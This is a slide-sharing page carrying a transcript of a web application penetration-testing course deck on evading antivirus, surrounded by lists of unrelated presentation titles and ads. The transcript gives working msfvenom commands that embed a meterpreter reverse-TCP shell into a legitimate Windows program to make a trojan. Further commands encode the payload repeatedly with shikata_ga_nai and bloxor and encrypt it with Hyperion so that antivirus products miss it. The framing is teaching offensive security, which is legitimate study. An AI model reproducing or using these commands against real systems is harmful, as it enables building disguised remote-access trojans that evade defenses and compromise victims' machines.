Bypassing Antivirus API

Slides:

Advertisements

Similar presentations

Hacking Techniques & Intrusion Detection Ali Al-Shemery arabnix [at] gmail.

Advertisements

Next Generation Endpoint Security Jason Brown Enterprise Solution Architect McAfee May 23, 2013.

By Hiranmayi Pai Neeraj Jain

1 SANS Technology Institute - Candidate for Master of Science Degree 1 Metasploit Payloads and Antivirus Mark Baggett December 2008 GIAC GSEC GCIH.

The MS Blaster worm Presented by: Zhi-Wen Ouyang.

©2009 Justin C. Klein Keane PHP Code Auditing Session 6 Auditing Strategies & Demonstration Justin C. Klein Keane

Copyright © Clifford Neuman - UNIVERSITY OF SOUTHERN CALIFORNIA - INFORMATION SCIENCES INSTITUTE USC CSci530 Computer Security Systems Lecture.

Microarray data analysis A practical example using GEPAS.

MIRAGE CPSC 620 Project By Neeraj Jain Hiranmayi Pai.

Dennis  Application Security Specialist  WhiteHat Security  Full-Time Student  University of Houston – Main Campus ▪ Computer.

Code Injection and Software Cracking’s Effect on Network Security Group 5 Jason Fritts Utsav Kanani Zener Bayudan ECE 4112 Fall 2007.

1 Backdoors and Trojans. ECE Internetwork Security 2 Agenda Overview Netcat Trojans/Backdoors.

4/13/2010.  CSS Meeting  Stephen Crane on Programming Contests  1pm  Building 8 room /11/10.

Chapter 15: Security (Part 1). The Security Problem Security must consider external environment of the system, and protect the system resources Intruders.

MIS Week 2 Site:

EECS 354 Network Security Metasploit Features. Hacking on the Internet Vulnerabilities are always being discovered 0day vulnerabilities Every server or.

Copyright (C) 2000, Network Associates Technology Inc. Advanced Windows NT/2000 Security (II) Beyond The User Command Shell… Into The Trusted Computing.

Nexthink V5 Demo Security – Malicious Anomaly. Situation › Avoid damage resulting from the incident itself and the cost of the unplanned response › Protection.

Pivoting UTD Computer Security Group Scott Hand 10 October 2012.

Rootkits, Backdoors, and Trojans ECE 4112 – Lab 5 Summary – Spring 2006 Group 9 Greg Sheridan Terry Harvey Group 10 Matthew Bowman Laura Silaghi Michael.

CNIT 124: Advanced Ethical Hacking Ch 10: Client-Side Exploitation.

CNIT 124: Advanced Ethical Hacking Docker (not in textbook) & Ch 8: Exploitation.

Module 1A An Introduction to Metasploit – Based upon Chapter 2 of “Metasploit the Penetration testers guide” Based upon Chapter 2 of “Metasploit the Penetration.

The hidden part of TDSS Sergey (k1k) Golovanov, Malware Expert Global Research and Analysis Team Kaspersky Lab.

Mac OS X backdoor Trojan, now in beta? 報告人：劉旭哲. Introduction It targets users of Mac OS X As even the malware itself admits, it is not yet finished. It.

Unveiling Zeus Automated Classification of Malware Samples Abedelaziz Mohaisen Omar Alrawi Verisign Inc, VA, USA Verisign Labs, VA, USA

Cosc 4765 Antivirus Approaches. In a Perfect world The best solution to viruses and worms to prevent infected the system –Generally considered impossible.

CIS 4930 / CIS 5930 Offensive Computer Security Spring 2014 I only edited it again.

©2014 Check Point Software Technologies Ltd Security Report “Critical Security Trends and What You Need to Know Today” Nick Hampson Security Engineering.

OVERVIEW Virus & Worm overview Virus & Worm Difference CodeRed Worm Impact Detection Prevention.

Penetration Testing Exploiting 2: Compromising Target by Metasploit tool CIS 6395, Incident Response Technologies Fall 2016, Dr. Cliff Zou

Sophos Intercept X Matt Cooke – Senior Product Marketing Manager.

Metasploit Framework (MSF) Fundamentals

Web Application Penetration Testing ‘17

Penetration Testing: Concepts,Attacks and Defence Stratagies

Chapter 15: Security.

Adversary playbook.

PART 1 – FILE UPLOAD BACKDOORS: METASPLOIT

Backdoor Attacks.

Network Exploitation Tool

Metasploit a one-stop hack shop

Remote Control and Advanced Techniques

Laura Jaideny Pérez Gómez - A

computer virus infection & symptoms

How to Fix McAfee Antivirus Error 7305? McAfee Helpline Number:

ADVANCED PERSISTENT THREATS (APTs) - Simulation

BotCatch: A Behavior and Signature Correlated Bot Detection Approach

Metasploit Project For this exploit I will be using the following strategy Create backdoor exe file Upload file to website Have victim computer download.

Exploiting Metasploitable

2017 Real Questions

Linux Exploitation Tools

Information Security Session October 24, 2005

Chap 10 Malicious Software.

A Distributed DoS in Action

Metasploit Assignment

Web Application Penetration Testing ‘17

Lab 7 – Defeating MALWARE

Metasploit Analysis Report Overview

Chap 10 Malicious Software.

Support for Slow PC Fix Slow Computer Issues Call us

Yet Another Botnet Find

Justin Brady Malware Forensics.

Crisis and Aftermath Morris worm.

Test 3 review FTP & Cybersecurity

Malicious Program and Protection

Penetration Testing & Network Defense

Chapter 9 Intruders and Viruses.

Presentation transcript:

Bypassing Antivirus API Web Application Penetration Testing ‘17

Bypassing Antivirus API Encoding malicious file so that it can’t be traced by the antivirus applications. Highlights – Creating Trojans using msfvenom. Encoding a Trojan. Shikata_ga_nai encoding. Multiencoding using msfvenom. Hyperion.

Creating Trojans using msfvenom Trojan – Malicious/Bad code file. Creating a Trojan handler with msfvenom - Msfvenom –p windows/meterpreter/reverse_tcp LHOST = [host ip] LPORT = [Desired Port] –x /usr/share/windows-binaries/radmin.exe –k –f exe > radmin.exe It will output trojaned radmin viewer with meterpreter reverse tcp shell. This will be used for exploiting windows target machine by running infected Radmin viewer.

Encoding a Trojan Trojan is encoded to be prevented from detecting by antivirus applications. Open kali terminal and type – Msfvenom –l encoders It will list encoders including their rank and description. x86/shikata_ga_nai is excellent ranked polymorphic XOR Additive Feedback Encoder.

Shikata_ga_nai Encoding Shikata_ga_nai is in Japanese meaning “It can’t be helped” Encoding with shikata_ga_nai – Msfvenom –p windows/meterpreter/reverse_tcp LHOST = [Host IP] LPORT = [Desired Port] –e x86/shikata_ga_nai –i 10 –f exe > Trojan.exe Upload the resulting binary to virus total website and check the results. The result will not be much efficient as antivirus developers check for the pre-define metaspoit templates. Results can be improved by multiencoding the Trojan.

Multiencoding using msfvenom In this demonstration, shikata_ga_nai and bloxor encoding will be used for multiencoding. First create an encoded RAW binary with shikata_ga_nai which can be later encoded and output into executable. Msfvenom –p windows/meterpreter/reverse_tcp LHOST = [Host IP] LPORT = [Desired Port] –e x86/shikata_ga_nai –i 10 –f raw > Trojan1.bin Now, again encode the output Raw binary using bloxor encoding. Msfvenom –p –f exe –a x86 – -platform windows –e x86/bloxor –i 10 > Trojan1.exe < Trojan1.bin Upload the output executable to virus total website, results will be far improved but yet not best.

Hyperion – Encrypting Meta Executable Hyperion uses Advanced Execution Standard (AES) Encryption which is current industry standard encryption. {Backend process is much related to cryptography background}. Encrypting Meta Executable: Msfvenom –p windows/meterpreter/reverse_tcp LHOST = [Host IP] LPORT = [Desired Port] –f exe > meta.exe Cd Hyperion-1.0/ Wine ../hyperion ../meta.exe bypassavhyperion.exe Upload the output executable to virus total and check the result.

Thanks